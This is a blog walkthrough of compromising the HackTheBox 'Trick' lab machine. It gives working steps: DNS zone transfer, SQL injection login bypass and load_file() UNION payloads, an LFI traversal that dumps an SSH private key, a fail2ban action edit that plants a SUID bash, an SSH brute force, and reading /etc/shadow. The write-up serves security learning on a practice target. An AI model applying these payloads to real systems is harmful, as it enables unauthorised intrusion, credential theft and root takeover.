Trick HackTheBox WalkThrough

Trick HackTheBox WalkThrough

This is Trick HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Trick HackTheBox machine. Before starting let us know something about this box. It is Linux OS box with IP address and difficulty easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Trick box by pinging its IP If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap [a popular port scanner] for this task and the result is given below: –


$ sudo nmap -p- --min-rate=10000 -oN fullTcp-scan.nmap
Nmap full port scan during Trick HackTheBox WalkThrough
$ sudo nmap -p22,25,53,80 -sC -sV -oN ScriptScan.nmap
Nmap script scan during Trick HackTheBox WalkThrough

Full port scan with $ nmap found port no. 22, 25, 53 and 80 as open. OpenSSH 7.9p1 on port 22, SMTP server on port 25, DNS on port 53 and Nginx web server on port 80 is running. Before entering into the enumeration part, let us add trick.htb to out hosts file. The advantage of it is that if there will be some virtual hosting enabled on the Nginx server then we would get some other website to enumerate on. The host file is present inside /etc/ directory of our Kali machine.

Host File After Modification 1

$ cat /etc/hosts
Host file after modification 1 during Trick HackTheBox WalkThrough

Since web server is running over port 80 so we have two URLs to check viz. and http://trick.htb. Ongoing to each of the URLs separately found the same web page which confirms that there is no any virtual hosting enabled [till now because we may get some new vhost further] on this server. We are free to use any URL while hunting. I will use http://trick.htb throughout the walkthrough. Ongoing to http://trick.htb found a simple website made up of html and some external CSS and JavaScript. Performed directory brute-forcing but nothing interesting was found. Checked the page source of the web page using CTRL+U, and again nothing useful was found.

Trick HackTheBox home page

After spending some more time on the website when did not find anything interesting then, moved forward to enumerate on port 53 where DNS server is running. We can perform DNS Zone Transfer here. Upon successful zone transfer, it may leak some internal DNS Zone records. Zone transfer is successful and we got two new virtual host namely, root.trick.htb & preprod-payroll.trick.htb.

$ dig @ trick.htb axfr
DNS Zone transfer on Trick HackTheBox machine during its walkthrough

Before performing further enumeration let us add these two vhosts [root.trick.htb & preprod-payroll.trick.htb] to our hosts file and let us see what new we get to enumerate on.

Host File After Modification 2

$ cat /etc/hosts
Host File after modification 2 on Trick HTB

http://root.trick.htb/ has the same web page as http://trick.htb/ but http://preprod-payroll.trick.htb/login.php has a different website present. Now we can say that there is virtual hosting enabled on this server. We have a login page so as usual, first of all, tried to log in with some basic/default credentials like admin : admin, admin : password, admin : trick, etc., but none of them worked. Then tried some basic SQL login screen bypass payloads and it worked.

Preprod-payroll.trick.htb home page on Trick HackTheBox WalkThrough

Using ' OR 1=1 -- : ' OR 1=1 -- I was able to bypass the login screen and logged in successfully as Administrator. It means this application is vulnerable to SQL Injection attack.

Admin panel of trick htb after login screen bypass during Trick HackTheBox WalkThrough

After some enumeration after login, found users page at http://preprod-payroll.trick.htb/index.php?page=users, which revealed the credential of Administrator viz., enemigosss : SuperGucciRainbowCake. Tried to use this credential as SSH credential but got a permission denied message. This error message confirmed that SSH is configured to use Key-Based Authentication rather than Password-Based Authentication. In key-based authentication, we require the private key of the SSH user, and then using that key we login into that user’s SSH account.

Discovering credential of admin user

Since this application is vulnerable to SQL injection we can use the function load_file() of the SQL to dump the id_rsa [private] key of the SSH user.

Dumping Sensitive files using load_file() of SQL

$ sqlmap -u http://preprod-payroll.trick.htb/manage_user.php?id=1 --dbs --time-sec=30 --thread 10
Dumping the database of trick HackTheBox user during its walkthrough

The SQL vulnerability is UNION Query based so we can use the UNION operator to join our SQL statement and see the result. Use URL http://preprod-payroll.trick.htb/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,NULL,Load_file(‘/etc/passwd’),NULL,NULL,NULL,NULL,NULL–+-  to dump the passwd file of trick box.

Note: I have dumped the passwd file first because this file contains details of all the users and their home directory. Once we will get the user details then we will try to dump their id_rsa [SSH private] key from their home directory.

Dumping the passwd file from trick HTB using load_file() sql function during trick walkthrough

On checking the passwd file, we found that there are only two users who have bash shell, root and michael. So, our next step should be to dump michael's private key [id_rsa] from his home directory viz., /home/michael/.ssh/. After checking, found that the private key is not present in his home directory. During my further enumeration found database credential remo : TrulyImpossiblePasswordLmao123, in file db_connect.php. Again, there is no use of this credential as SSH creds since only key-based authentication is enabled on trick machine.


Discovering the database user credential file from trick HTB using load_file() sql function during trick walkthrough

Then I tried to access the log files of the Nginx server viz., access.log and error.log so that I could perform log-poisoning attack to get remote code execution. Luckily, error.log was accessible but log poisoning was not working. For more info on how log-poisoning works I have explained it in the Poison HTB box.


Dumping error.log file from trick HTB using load_file() sql function during trick walkthrough

Until now, I could not find anything interesting, which could help me to proceed further even if I have SQL Injection vulnerability. After some, more enumeration and fuzzing found a vhost preprod-marketing.trick.htb.

$ cp /opt/SecLists/Discovery/DNS/namelist.txt .
$ for i in $(cat namelist.txt); do echo "preprod-$i"; done > # To prepend preprod- to every words in the file namelist.txt
$ gobuster vhost -u http://trick.htb -w

Let us add preprod-marketing.trick.htb to our hosts file.

Host File After Modification 3

$ cat /etc/hosts
Host File after modification 3 on Trick HTB

Ongoing to URL http://preprod-marketing.trick.htb/ found a new website.

Home page of preprod-marketing.trick.htb website during trick walkthrough

After some enumeration found the LFI (Local File Inclusion) vulnerability which can be confirmed by the URL view-source:http://preprod-marketing.trick.htb/index.php?page=….//….//….//….//….//etc/passwd  

passwd file of trick htb machine

As we have previously tried to dump SSH private key from michael's home directory using load_file() function, this time too tried to dump his private key and was successful as the key is present there. view-source:http://preprod-marketing.trick.htb/index.php?page=….//….//….//….//….//home/michael/.ssh/id_rsa   

SSH private key of michael user dumped using LFI vulnerability

Let us use this SSH private key to get into the box.

Getting User Shell

$ vi michael_key # To add private key in michael_key file
$ chmod 400 michael_key
$ ssh -i michael_key [email protected]
$ whoami && id
Getting user shell during Trick HackTheBox WalkThrough

We have got user shell. Let us capture the user flag.

Capture User Flag

$ cat user.txt
Capturing user flag in Trick HTB

Privilege Escalation

To escalate the privilege to root we have to first find a Privilege Escalation Vector using, which we can perform, privilege escalation. We can find the PrivEsc vector either manually or using some post-exploitation enumeration scripts like, and there are a lot more. This time I will go with the LinPEAS viz. script enumeration technique.

Finding PrivEsc Vector

LinPEAS found that user michael can run the command $ /etc/init.d/fail2ban restart as root or we can say michael can run the command $ sudo /etc/init.d/fail2ban restart, it won’t ask for the root password.

Sudo -l result

LinPEAS also found that folder action.d which is present inside the directory /etc/fail2ban/ is writable/modifiable by the user who belongs to the same group to which action.d belongs.

Group writeable file in Trick HTB  found by LinPEAS

Let us know something about fail2ban software. Fail2ban is an IDPS (Intrusion Detection & Prevention System) tool that detects brute-force attacks and blocks malicious IP addresses by using Linux iptables. Most of the time, it is used to prevent the server from SSH brute force, although it can also be used to prevent brute-force attacks on a variety of services like HTTP, SMTP, IMAP, etc. Fail2ban daemon reads the log files and if a malicious pattern is detected (e.g multiple failed login requests) it executes a command for blocking the IP for a certain period of time or maybe forever.

Its default configuration file is jail.conf [or jail.local, if modified]. Since in our case /etc/fail2ban/ contains only jail.conf therefore the application will use this default file here. jail.conf contains the information about the services which are being monitored by fail2ban tool. After reading this file we found that SSH service is being monitored and if max retry exceeds 5 then it will ban particular IP for 10s. The action, which will be executed after the IP ban, will be based on the rule, which is defined in the configuration file iptables-mutilports.conf present in the directory /etc/fail2ban/action.d.

$ cd /etc/fail2ban/
$ vi jail.conf
jail.conf file content

Now, there comes the privilege escalation part. Since at the end, iptables-multiports.conf decides what action will be performed on a particular IP ban. Therefore, if we introduce our reverse shell code inside this file and after the execution of $ sudo /etc/init.d/fail2ban restart, iptables-multiports.conf will also be executed by root permission then we will get reverse shell with root privilege.

From the below screenshot, we found that folder action.d and user michael both belong to the same group [security] therefore michael can modify every file present inside action.d folder [that too is also reported by LinPEAS above]. Since iptables-multiports.conf is also present inside action.d folder, therefore michael can also modify this file too.

$ ls -la /etc/fail2ban/
$ id
Permission of fail2ban folder

Once iptables-multiports.conf is modified restart the service fail2ban using the following command.

$ sudo /etc/init.d/fail2ban restart

After the service is restarted we require to start a brute-force attack on SSH so that ban can occur and our modified iptables-multiports.conf file will be executed. Since fail2ban will be executed by root permission, so our introduced command will also be executed by root permission. When I tried to follow the same steps I would easily get root. So here, our privilege escalation vector is Privilege Escalation by Sudo Rights Exploitation.

Getting Root Shell

To get root shell follow the given steps.

  1. Modify the file iptables-mutilports.conf by introducing command $ cp /bin/bash /tmp && chmod 4755 /tmp/bash on actionban line.
  2. Restart the service by the command $ sudo /etc/init.d/fail2ban restart
  3. Bruteforce on SSH account and keep on checking the file permission in tmp folder. Once you get SUID bit [i.e., s included in file permission] set to the bash file then stop the brute force attack.
  4. At last, run the command /tmp/bash -p to get root shell.

In Terminal 1

$ cd /etc/fail2ban/action.d/
$ cd ../action.d/
$ vi iptables-multiport.conf
$ sudo /etc/init.d/fail2ban restart # To restart the fail2ban service
$ ls -la /tmp/bash | grep -i bash
$ /tmp/bash -p
# whoami && id

In Terminal 2

$ crackmapexec ssh -u 'michael' -p /usr/share/wordlists/rockyou.txt
Modified content of iptables-multiport.conf file during Trick HackTheBox WalkThrough
Getting root shell in trick htb

We successfully got root shell. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt
Capturing root flag during trick htb walkthrough

This was how I rooted Trick HackTheBox machine. Learned a lot after solving this box. Hope you will have also learned some new things. Thanks for reading this walkthrough. For any query or suggestion about the walkthrough, feel free to write us at [email protected].

Dumping Root Hash

$ cat /etc/shadow | grep -i root
Dumping root hash during Trick HackTheBox WalkThrough

This Post Has 2 Comments

  1. sam

    for finding another vhost, instead of bruteforcing the vhosts we could enumerate /etc/nginx/sites-enabled/default which shows all the routing. All write-ups shows the bruteforcing of the vhosts:)

    1. Deepak Kumar Maurya

      Yes, that can be a possible way too. I forgot to check that file. Thanks for pointing. Next time will definitely try whenever I will get LFI. I don’t know which other writeup showed vhost bruteforce since I didn’t read any walkthrough on the internet regarding the trick machine. Whatever I write I do it on my own. If other writeup shows vhost bruteforce it may be one of the intended way of enumerating the virtual host.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at